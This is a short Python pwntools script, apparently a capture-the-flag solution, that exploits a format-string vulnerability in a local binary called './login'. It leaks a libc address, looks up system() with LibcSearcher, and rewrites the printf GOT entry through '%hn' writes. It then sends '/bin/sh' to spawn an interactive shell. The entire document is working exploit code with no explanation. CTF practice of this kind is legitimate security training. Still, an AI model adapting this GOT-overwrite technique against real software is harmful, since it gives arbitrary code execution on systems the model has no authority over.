from pwn import * from LibcSearcher import * io = process('./login') elf = ELF('./login') # gdb.attach(io,'b *0x080485AA') def change(n,k): payload = '%'+str(n)+'c%'+str(k)+'$hn' io.sendlineafter('Try again!\n',payload) io.sendlineafter('your name: \n','admin') io.sendlineafter('password: \n','AAAA%15$pBBBB%6$p') io.recvuntil('AAAA') __libc_start_main = int(io.recv(10),16) - 247 libc = LibcSearcher('__libc_start_main',__libc_start_main) offset = __libc_start_main - libc.dump('__libc_start_main') success(hex(offset)) system = offset + libc.dump('system') success(hex(system)) io.recvuntil('BBBB') p = int(io.recv(10),16) change(int(hex(p)[6:10],16)-12,6) change(int('b014',16),10) change(int(hex(p)[6:10],16)+4,6) change(int('b016',16),10) addr1=int(hex(system)[6:10],16) addr2=int(hex(system)[2:6],16) payload = '%'+str(addr1)+'c%7$hn'+'%'+str(addr2-addr1)+'c%11$hn' io.sendlineafter('Try again!\n',payload) io.sendlineafter('Try again!\n','/bin/sh\x00') io.interactive() # 6 7 10 11 15 #printf_got:0x0804b014